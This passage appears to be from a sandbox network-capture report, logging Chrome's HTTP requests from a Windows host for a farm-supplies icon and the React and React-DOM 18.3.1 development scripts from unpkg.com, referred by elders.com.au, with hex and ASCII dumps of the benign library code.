                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: affinity="e47c197095b8b7ee"
                                                                                                                                    2024-11-05 08:03:23 UTC710INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:23 GMT
                                                                                                                                    Content-Type: image/png
                                                                                                                                    Content-Length: 443
                                                                                                                                    Connection: close
                                                                                                                                    last-modified: Wed, 08 Feb 2023 05:11:19 GMT
                                                                                                                                    etag: "0x8DB0992E9D1A95B"
                                                                                                                                    content-disposition: attachment; filename="icon_farm_supplies.png"; filename*=UTF-8''icon_farm_supplies.png
                                                                                                                                    access-control-allow-origin: *
                                                                                                                                    Cache-Control: public, max-age=86400, immutable
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    x-vhost: publish
                                                                                                                                    strict-transport-security: max-age=31557600
                                                                                                                                    x-served-by: cache-lax-kwhp1940101-LAX
                                                                                                                                    x-cache: MISS
                                                                                                                                    x-timer: S1721956918.168810,VS0,VS0,VE1195
                                                                                                                                    CF-Cache-Status: REVALIDATED
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53b2bdc52c9a-DFW
                                                                                                                                    2024-11-05 08:03:23 UTC443INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 1e 00 00 00 1e 08 06 00 00 00 3b 30 ae a2 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 01 6d 49 44 41 54 48 89 ed 97 cd 4d c4 30 10 85 1f 88 7b e8 c0 7b c9 31 da 74 00 1d b0 1d 40 09 5b c2 96 40 07 50 02 1d b0 74 b0 28 c7 5c 36 1d 2c 15 04 8d 34 2b 45 de 79 8e 3d 90 0b e2 49 51 94 f8 e7 b3 c7 33 63 fb 6a 1c 47 78 d4 85 ba 95 66 cd d0 1f 3c ed 29 b8 0b f5 2d 80 1d 80 56 7f ed 01 1c f4 7b 0b a0 d2 ff 83 d6 3b 01 b8 9f d4 7f 6b 86 fe 99 81 6f 66 06 f6 34 01 dc 91 3a 01 c0 0b 29 a3 e0 6b 56 d0 0c bd cc 60 33 33 30 a6 2f 1d 34 15 05 ab 36 da 49 a9 ce 66 77 83 db 89 a9 4b 14 26 6b ed 02 ef 1c 50 a8 95 92 6d 97 02 57 ea f9 54 a9 70 92 35 7a 77 82 a1 b3 5e a9 93 5e 28 35 e3 a4 57 66
                                                                                                                                    Data Ascii: PNGIHDR;0pHYs~mIDATHM0{{1t@[@Pt(\6,4+Ey=IQ3cjGxf<)-V{;kof4:)kV`330/46IfwK&kPmWTp5zw^^(5Wf


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    94192.168.2.449868104.17.249.2034435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:22 UTC571OUTGET /react@18.3.1/umd/react.development.js HTTP/1.1
                                                                                                                                    Host: unpkg.com
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    Origin: https://elders.com.au
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                    Referer: https://elders.com.au/
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    2024-11-05 08:03:22 UTC576INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:22 GMT
                                                                                                                                    Content-Type: application/javascript; charset=utf-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    access-control-allow-origin: *
                                                                                                                                    cache-control: public, max-age=31536000
                                                                                                                                    last-modified: Sat, 26 Oct 1985 08:15:00 GMT
                                                                                                                                    etag: W/"1ad6b-kNV4OIuev8g4lblTOp0VuOU34Qg"
                                                                                                                                    via: 1.1 fly.io
                                                                                                                                    fly-request-id: 01JB1FAX2F93CYQ7KRKFYC268G-dfw
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 946082
                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53b2dc9e6b8f-DFW
                                                                                                                                    2024-11-05 08:03:22 UTC793INData Raw: 37 64 36 30 0d 0a 2f 2a 2a 0a 20 2a 20 40 6c 69 63 65 6e 73 65 20 52 65 61 63 74 0a 20 2a 20 72 65 61 63 74 2e 64 65 76 65 6c 6f 70 6d 65 6e 74 2e 6a 73 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 61 6e 64 20 69 74 73 20 61 66 66 69 6c 69 61 74 65 73 2e 0a 20 2a 0a 20 2a 20 54 68 69 73 20 73 6f 75 72 63 65 20 63 6f 64 65 20 69 73 20 6c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 20 66 6f 75 6e 64 20 69 6e 20 74 68 65 0a 20 2a 20 4c 49 43 45 4e 53 45 20 66 69 6c 65 20 69 6e 20 74 68 65 20 72 6f 6f 74 20 64 69 72 65 63 74 6f 72 79 20 6f 66 20 74 68 69 73 20 73 6f 75 72 63 65 20 74 72 65 65 2e 0a 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 20 28 67 6c 6f 62
                                                                                                                                    Data Ascii: 7d60/** * @license React * react.development.js * * Copyright (c) Facebook, Inc. and its affiliates. * * This source code is licensed under the MIT license found in the * LICENSE file in the root directory of this source tree. */(function (glob
                                                                                                                                    2024-11-05 08:03:22 UTC1369INData Raw: 53 79 6d 62 6f 6c 2e 66 6f 72 28 27 72 65 61 63 74 2e 65 6c 65 6d 65 6e 74 27 29 3b 0a 20 20 76 61 72 20 52 45 41 43 54 5f 50 4f 52 54 41 4c 5f 54 59 50 45 20 3d 20 53 79 6d 62 6f 6c 2e 66 6f 72 28 27 72 65 61 63 74 2e 70 6f 72 74 61 6c 27 29 3b 0a 20 20 76 61 72 20 52 45 41 43 54 5f 46 52 41 47 4d 45 4e 54 5f 54 59 50 45 20 3d 20 53 79 6d 62 6f 6c 2e 66 6f 72 28 27 72 65 61 63 74 2e 66 72 61 67 6d 65 6e 74 27 29 3b 0a 20 20 76 61 72 20 52 45 41 43 54 5f 53 54 52 49 43 54 5f 4d 4f 44 45 5f 54 59 50 45 20 3d 20 53 79 6d 62 6f 6c 2e 66 6f 72 28 27 72 65 61 63 74 2e 73 74 72 69 63 74 5f 6d 6f 64 65 27 29 3b 0a 20 20 76 61 72 20 52 45 41 43 54 5f 50 52 4f 46 49 4c 45 52 5f 54 59 50 45 20 3d 20 53 79 6d 62 6f 6c 2e 66 6f 72 28 27 72 65 61 63 74 2e 70 72 6f 66
                                                                                                                                    Data Ascii: Symbol.for('react.element'); var REACT_PORTAL_TYPE = Symbol.for('react.portal'); var REACT_FRAGMENT_TYPE = Symbol.for('react.fragment'); var REACT_STRICT_MODE_TYPE = Symbol.for('react.strict_mode'); var REACT_PROFILER_TYPE = Symbol.for('react.prof
                                                                                                                                    2024-11-05 08:03:22 UTC1369INData Raw: 20 20 20 2a 20 4b 65 65 70 73 20 74 72 61 63 6b 20 6f 66 20 74 68 65 20 63 75 72 72 65 6e 74 20 62 61 74 63 68 27 73 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 73 75 63 68 20 61 73 20 68 6f 77 20 6c 6f 6e 67 20 61 6e 20 75 70 64 61 74 65 0a 20 20 20 2a 20 73 68 6f 75 6c 64 20 73 75 73 70 65 6e 64 20 66 6f 72 20 69 66 20 69 74 20 6e 65 65 64 73 20 74 6f 2e 0a 20 20 20 2a 2f 0a 20 20 76 61 72 20 52 65 61 63 74 43 75 72 72 65 6e 74 42 61 74 63 68 43 6f 6e 66 69 67 20 3d 20 7b 0a 20 20 20 20 74 72 61 6e 73 69 74 69 6f 6e 3a 20 6e 75 6c 6c 0a 20 20 7d 3b 0a 0a 20 20 76 61 72 20 52 65 61 63 74 43 75 72 72 65 6e 74 41 63 74 51 75 65 75 65 20 3d 20 7b 0a 20 20 20 20 63 75 72 72 65 6e 74 3a 20 6e 75 6c 6c 2c 0a 20 20 20 20 2f 2f 20 55 73 65 64 20 74 6f 20 72 65
                                                                                                                                    Data Ascii: * Keeps track of the current batch's configuration such as how long an update * should suspend for if it needs to. */ var ReactCurrentBatchConfig = { transition: null }; var ReactCurrentActQueue = { current: null, // Used to re
                                                                                                                                    2024-11-05 08:03:22 UTC1369INData Raw: 20 20 20 20 76 61 72 20 69 6d 70 6c 20 3d 20 52 65 61 63 74 44 65 62 75 67 43 75 72 72 65 6e 74 46 72 61 6d 65 2e 67 65 74 43 75 72 72 65 6e 74 53 74 61 63 6b 3b 0a 0a 20 20 20 20 20 20 69 66 20 28 69 6d 70 6c 29 20 7b 0a 20 20 20 20 20 20 20 20 73 74 61 63 6b 20 2b 3d 20 69 6d 70 6c 28 29 20 7c 7c 20 27 27 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 73 74 61 63 6b 3b 0a 20 20 20 20 7d 3b 0a 20 20 7d 0a 0a 20 20 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 0a 20 20 76 61 72 20 65 6e 61 62 6c 65 53 63 6f 70 65 41 50 49 20 3d 20 66 61
                                                                                                                                    Data Ascii: var impl = ReactDebugCurrentFrame.getCurrentStack; if (impl) { stack += impl() || ''; } return stack; }; } // ----------------------------------------------------------------------------- var enableScopeAPI = fa
                                                                                                                                    2024-11-05 08:03:22 UTC1369INData Raw: 61 72 67 73 5b 5f 6b 65 79 20 2d 20 31 5d 20 3d 20 61 72 67 75 6d 65 6e 74 73 5b 5f 6b 65 79 5d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 70 72 69 6e 74 57 61 72 6e 69 6e 67 28 27 77 61 72 6e 27 2c 20 66 6f 72 6d 61 74 2c 20 61 72 67 73 29 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 7d 0a 20 20 66 75 6e 63 74 69 6f 6e 20 65 72 72 6f 72 28 66 6f 72 6d 61 74 29 20 7b 0a 20 20 20 20 7b 0a 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 66 6f 72 20 28 76 61 72 20 5f 6c 65 6e 32 20 3d 20 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 20 61 72 67 73 20 3d 20 6e 65 77 20 41 72 72 61 79 28 5f 6c 65 6e 32 20 3e 20 31 20 3f 20 5f 6c 65 6e 32 20 2d 20 31 20 3a 20 30 29 2c 20 5f 6b 65 79 32 20 3d 20 31 3b 20 5f 6b 65 79 32 20 3c 20
                                                                                                                                    Data Ascii: args[_key - 1] = arguments[_key]; } printWarning('warn', format, args); } } } function error(format) { { { for (var _len2 = arguments.length, args = new Array(_len2 > 1 ? _len2 - 1 : 0), _key2 = 1; _key2 <
                                                                                                                                    2024-11-05 08:03:22 UTC1369INData Raw: 61 74 65 46 6f 72 55 6e 6d 6f 75 6e 74 65 64 43 6f 6d 70 6f 6e 65 6e 74 20 3d 20 7b 7d 3b 0a 0a 20 20 66 75 6e 63 74 69 6f 6e 20 77 61 72 6e 4e 6f 6f 70 28 70 75 62 6c 69 63 49 6e 73 74 61 6e 63 65 2c 20 63 61 6c 6c 65 72 4e 61 6d 65 29 20 7b 0a 20 20 20 20 7b 0a 20 20 20 20 20 20 76 61 72 20 5f 63 6f 6e 73 74 72 75 63 74 6f 72 20 3d 20 70 75 62 6c 69 63 49 6e 73 74 61 6e 63 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6d 70 6f 6e 65 6e 74 4e 61 6d 65 20 3d 20 5f 63 6f 6e 73 74 72 75 63 74 6f 72 20 26 26 20 28 5f 63 6f 6e 73 74 72 75 63 74 6f 72 2e 64 69 73 70 6c 61 79 4e 61 6d 65 20 7c 7c 20 5f 63 6f 6e 73 74 72 75 63 74 6f 72 2e 6e 61 6d 65 29 20 7c 7c 20 27 52 65 61 63 74 43 6c 61 73 73 27 3b 0a 20 20 20 20 20 20 76
                                                                                                                                    Data Ascii: ateForUnmountedComponent = {}; function warnNoop(publicInstance, callerName) { { var _constructor = publicInstance.constructor; var componentName = _constructor && (_constructor.displayName || _constructor.name) || 'ReactClass'; v
                                                                                                                                    2024-11-05 08:03:22 UTC1369INData Raw: 73 20 77 68 65 6e 20 79 6f 75 20 6b 6e 6f 77 20 74 68 61 74 20 73 6f 6d 65 20 64 65 65 70 65 72 20 61 73 70 65 63 74 20 6f 66 20 74 68 65 0a 20 20 20 20 20 2a 20 63 6f 6d 70 6f 6e 65 6e 74 27 73 20 73 74 61 74 65 20 68 61 73 20 63 68 61 6e 67 65 64 20 62 75 74 20 60 73 65 74 53 74 61 74 65 60 20 77 61 73 20 6e 6f 74 20 63 61 6c 6c 65 64 2e 0a 20 20 20 20 20 2a 0a 20 20 20 20 20 2a 20 54 68 69 73 20 77 69 6c 6c 20 6e 6f 74 20 69 6e 76 6f 6b 65 20 60 73 68 6f 75 6c 64 43 6f 6d 70 6f 6e 65 6e 74 55 70 64 61 74 65 60 2c 20 62 75 74 20 69 74 20 77 69 6c 6c 20 69 6e 76 6f 6b 65 0a 20 20 20 20 20 2a 20 60 63 6f 6d 70 6f 6e 65 6e 74 57 69 6c 6c 55 70 64 61 74 65 60 20 61 6e 64 20 60 63 6f 6d 70 6f 6e 65 6e 74 44 69 64 55 70 64 61 74 65 60 2e 0a 20 20 20 20 20 2a
                                                                                                                                    Data Ascii: s when you know that some deeper aspect of the * component's state has changed but `setState` was not called. * * This will not invoke `shouldComponentUpdate`, but it will invoke * `componentWillUpdate` and `componentDidUpdate`. *
                                                                                                                                    2024-11-05 08:03:22 UTC1369INData Raw: 63 49 6e 73 74 61 6e 63 65 2c 20 27 72 65 70 6c 61 63 65 53 74 61 74 65 27 29 3b 0a 20 20 20 20 7d 2c 0a 0a 20 20 20 20 2f 2a 2a 0a 20 20 20 20 20 2a 20 53 65 74 73 20 61 20 73 75 62 73 65 74 20 6f 66 20 74 68 65 20 73 74 61 74 65 2e 20 54 68 69 73 20 6f 6e 6c 79 20 65 78 69 73 74 73 20 62 65 63 61 75 73 65 20 5f 70 65 6e 64 69 6e 67 53 74 61 74 65 20 69 73 0a 20 20 20 20 20 2a 20 69 6e 74 65 72 6e 61 6c 2e 20 54 68 69 73 20 70 72 6f 76 69 64 65 73 20 61 20 6d 65 72 67 69 6e 67 20 73 74 72 61 74 65 67 79 20 74 68 61 74 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 64 65 65 70 0a 20 20 20 20 20 2a 20 70 72 6f 70 65 72 74 69 65 73 20 77 68 69 63 68 20 69 73 20 63 6f 6e 66 75 73 69 6e 67 2e 20 54 4f 44 4f 3a 20 45 78 70 6f 73 65 20 70 65 6e
                                                                                                                                    Data Ascii: cInstance, 'replaceState'); }, /** * Sets a subset of the state. This only exists because _pendingState is * internal. This provides a merging strategy that is not available to deep * properties which is confusing. TODO: Expose pen
                                                                                                                                    2024-11-05 08:03:22 UTC1369INData Raw: 20 73 75 62 73 65 74 20 6f 66 20 74 68 65 20 73 74 61 74 65 2e 20 41 6c 77 61 79 73 20 75 73 65 20 74 68 69 73 20 74 6f 20 6d 75 74 61 74 65 0a 20 20 20 2a 20 73 74 61 74 65 2e 20 59 6f 75 20 73 68 6f 75 6c 64 20 74 72 65 61 74 20 60 74 68 69 73 2e 73 74 61 74 65 60 20 61 73 20 69 6d 6d 75 74 61 62 6c 65 2e 0a 20 20 20 2a 0a 20 20 20 2a 20 54 68 65 72 65 20 69 73 20 6e 6f 20 67 75 61 72 61 6e 74 65 65 20 74 68 61 74 20 60 74 68 69 73 2e 73 74 61 74 65 60 20 77 69 6c 6c 20 62 65 20 69 6d 6d 65 64 69 61 74 65 6c 79 20 75 70 64 61 74 65 64 2c 20 73 6f 0a 20 20 20 2a 20 61 63 63 65 73 73 69 6e 67 20 60 74 68 69 73 2e 73 74 61 74 65 60 20 61 66 74 65 72 20 63 61 6c 6c 69 6e 67 20 74 68 69 73 20 6d 65 74 68 6f 64 20 6d 61 79 20 72 65 74 75 72 6e 20 74 68 65 20
                                                                                                                                    Data Ascii: subset of the state. Always use this to mutate * state. You should treat `this.state` as immutable. * * There is no guarantee that `this.state` will be immediately updated, so * accessing `this.state` after calling this method may return the
                                                                                                                                    2024-11-05 08:03:22 UTC1369INData Raw: 29 20 7b 0a 20 20 20 20 20 20 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 27 73 65 74 53 74 61 74 65 28 2e 2e 2e 29 3a 20 74 61 6b 65 73 20 61 6e 20 6f 62 6a 65 63 74 20 6f 66 20 73 74 61 74 65 20 76 61 72 69 61 62 6c 65 73 20 74 6f 20 75 70 64 61 74 65 20 6f 72 20 61 20 27 20 2b 20 27 66 75 6e 63 74 69 6f 6e 20 77 68 69 63 68 20 72 65 74 75 72 6e 73 20 61 6e 20 6f 62 6a 65 63 74 20 6f 66 20 73 74 61 74 65 20 76 61 72 69 61 62 6c 65 73 2e 27 29 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 74 68 69 73 2e 75 70 64 61 74 65 72 2e 65 6e 71 75 65 75 65 53 65 74 53 74 61 74 65 28 74 68 69 73 2c 20 70 61 72 74 69 61 6c 53 74 61 74 65 2c 20 63 61 6c 6c 62 61 63 6b 2c 20 27 73 65 74 53 74 61 74 65 27 29 3b 0a 20 20 7d 3b 0a 20 20 2f 2a 2a 0a 20 20 20 2a 20 46 6f 72
                                                                                                                                    Data Ascii: ) { throw new Error('setState(...): takes an object of state variables to update or a ' + 'function which returns an object of state variables.'); } this.updater.enqueueSetState(this, partialState, callback, 'setState'); }; /** * For


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    95192.168.2.449869104.17.249.2034435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:22 UTC579OUTGET /react-dom@18.3.1/umd/react-dom.development.js HTTP/1.1
                                                                                                                                    Host: unpkg.com
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    Origin: https://elders.com.au
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                    Referer: https://elders.com.au/
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    2024-11-05 08:03:22 UTC577INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:22 GMT
                                                                                                                                    Content-Type: application/javascript; charset=utf-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    access-control-allow-origin: *
                                                                                                                                    cache-control: public, max-age=31536000
                                                                                                                                    last-modified: Sat, 26 Oct 1985 08:15:00 GMT
                                                                                                                                    etag: W/"107ba3-qzvQLFMixpPr5ugkuocUHlejoYo"
                                                                                                                                    via: 1.1 fly.io
                                                                                                                                    fly-request-id: 01JBP8SYNDQWRGJS64H9J83K3V-dfw
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 248287
                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53b2ee312d45-DFW
                                                                                                                                    2024-11-05 08:03:22 UTC792INData Raw: 37 64 36 30 0d 0a 2f 2a 2a 0a 20 2a 20 40 6c 69 63 65 6e 73 65 20 52 65 61 63 74 0a 20 2a 20 72 65 61 63 74 2d 64 6f 6d 2e 64 65 76 65 6c 6f 70 6d 65 6e 74 2e 6a 73 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 61 6e 64 20 69 74 73 20 61 66 66 69 6c 69 61 74 65 73 2e 0a 20 2a 0a 20 2a 20 54 68 69 73 20 73 6f 75 72 63 65 20 63 6f 64 65 20 69 73 20 6c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 20 66 6f 75 6e 64 20 69 6e 20 74 68 65 0a 20 2a 20 4c 49 43 45 4e 53 45 20 66 69 6c 65 20 69 6e 20 74 68 65 20 72 6f 6f 74 20 64 69 72 65 63 74 6f 72 79 20 6f 66 20 74 68 69 73 20 73 6f 75 72 63 65 20 74 72 65 65 2e 0a 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 20 28
                                                                                                                                    Data Ascii: 7d60/** * @license React * react-dom.development.js * * Copyright (c) Facebook, Inc. and its affiliates. * * This source code is licensed under the MIT license found in the * LICENSE file in the root directory of this source tree. */(function (
                                                                                                                                    2024-11-05 08:03:22 UTC1369INData Raw: 77 53 75 70 70 72 65 73 73 57 61 72 6e 69 6e 67 3b 0a 20 20 20 20 7d 0a 20 20 7d 20 2f 2f 20 49 6e 20 44 45 56 2c 20 63 61 6c 6c 73 20 74 6f 20 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 20 61 6e 64 20 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 20 67 65 74 20 72 65 70 6c 61 63 65 64 0a 20 20 2f 2f 20 62 79 20 63 61 6c 6c 73 20 74 6f 20 74 68 65 73 65 20 6d 65 74 68 6f 64 73 20 62 79 20 61 20 42 61 62 65 6c 20 70 6c 75 67 69 6e 2e 0a 20 20 2f 2f 0a 20 20 2f 2f 20 49 6e 20 50 52 4f 44 20 28 6f 72 20 69 6e 20 70 61 63 6b 61 67 65 73 20 77 69 74 68 6f 75 74 20 61 63 63 65 73 73 20 74 6f 20 52 65 61 63 74 20 69 6e 74 65 72 6e 61 6c 73 29 2c 0a 20 20 2f 2f 20 74 68 65 79 20 61 72 65 20 6c 65 66 74 20 61 73 20 74 68 65 79 20 61 72 65 20 69 6e 73 74 65 61 64 2e 0a 0a 20 20
                                                                                                                                    Data Ascii: wSuppressWarning; } } // In DEV, calls to console.warn and console.error get replaced // by calls to these methods by a Babel plugin. // // In PROD (or in packages without access to React internals), // they are left as they are instead.
                                                                                                                                    2024-11-05 08:03:22 UTC1369INData Raw: 65 6d 29 20 7b 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 53 74 72 69 6e 67 28 69 74 65 6d 29 3b 0a 20 20 20 20 20 20 7d 29 3b 20 2f 2f 20 43 61 72 65 66 75 6c 3a 20 52 4e 20 63 75 72 72 65 6e 74 6c 79 20 64 65 70 65 6e 64 73 20 6f 6e 20 74 68 69 73 20 70 72 65 66 69 78 0a 0a 20 20 20 20 20 20 61 72 67 73 57 69 74 68 46 6f 72 6d 61 74 2e 75 6e 73 68 69 66 74 28 27 57 61 72 6e 69 6e 67 3a 20 27 20 2b 20 66 6f 72 6d 61 74 29 3b 20 2f 2f 20 57 65 20 69 6e 74 65 6e 74 69 6f 6e 61 6c 6c 79 20 64 6f 6e 27 74 20 75 73 65 20 73 70 72 65 61 64 20 28 6f 72 20 2e 61 70 70 6c 79 29 20 64 69 72 65 63 74 6c 79 20 62 65 63 61 75 73 65 20 69 74 0a 20 20 20 20 20 20 2f 2f 20 62 72 65 61 6b 73 20 49 45 39 3a 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f
                                                                                                                                    Data Ascii: em) { return String(item); }); // Careful: RN currently depends on this prefix argsWithFormat.unshift('Warning: ' + format); // We intentionally don't use spread (or .apply) directly because it // breaks IE9: https://github.com/
                                                                                                                                    2024-11-05 08:03:22 UTC1369INData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 0a 20 20 76 61 72 20 65 6e 61 62 6c 65 43 6c 69 65 6e 74 52 65 6e 64 65 72 46 61 6c 6c 62 61 63 6b 4f 6e 54 65 78 74 4d 69 73 6d 61 74 63 68 20 3d 20 74 72 75 65 3b 20 2f 2f 20 54 4f 44 4f 3a 20 4e 65 65 64 20 74 6f 20 72 65 76 69 65 77 20 74 68 69 73 20 63 6f 64 65 20 6f 6e 65 20 6d 6f 72 65 20 74 69 6d 65 20 62 65 66 6f 72 65 20 6c 61 6e 64 69 6e 67 0a 20 20 2f 2f 20 74 68 65 20 72 65 61 63 74 2d 72 65 63 6f 6e 63 69 6c 65 72 20 70 61 63 6b 61 67 65 2e 0a 0a 20 20 76 61 72 20 65 6e 61 62 6c 65 4e 65 77 52 65 63 6f 6e 63 69 6c 65 72 20 3d 20 66 61 6c 73 65 3b 20 2f 2f 20 53 75 70 70 6f 72 74 20 6c 65 67 61 63 79 20 50 72 69 6d 65 72 20 73 75 70 70 6f 72 74 20 6f 6e 20 69 6e 74 65 72 6e 61 6c 20 46 42 20
                                                                                                                                    Data Ascii: ---------------- var enableClientRenderFallbackOnTextMismatch = true; // TODO: Need to review this code one more time before landing // the react-reconciler package. var enableNewReconciler = false; // Support legacy Primer support on internal FB
                                                                                                                                    2024-11-05 08:03:22 UTC1369INData Raw: 20 66 6f 72 20 3c 74 65 78 74 61 72 65 61 3e 20 65 6c 65 6d 65 6e 74 73 0a 20 20 76 61 72 20 77 61 72 6e 41 62 6f 75 74 53 74 72 69 6e 67 52 65 66 73 20 3d 20 74 72 75 65 3b 20 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 20 20 2f 2f 20 44 65 62 75 67 67 69 6e 67 20 61 6e 64 20 44 65 76 54 6f 6f 6c 73 0a 20 20 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 20 20 2f 2f
                                                                                                                                    Data Ascii: for <textarea> elements var warnAboutStringRefs = true; // ----------------------------------------------------------------------------- // Debugging and DevTools // ----------------------------------------------------------------------------- //
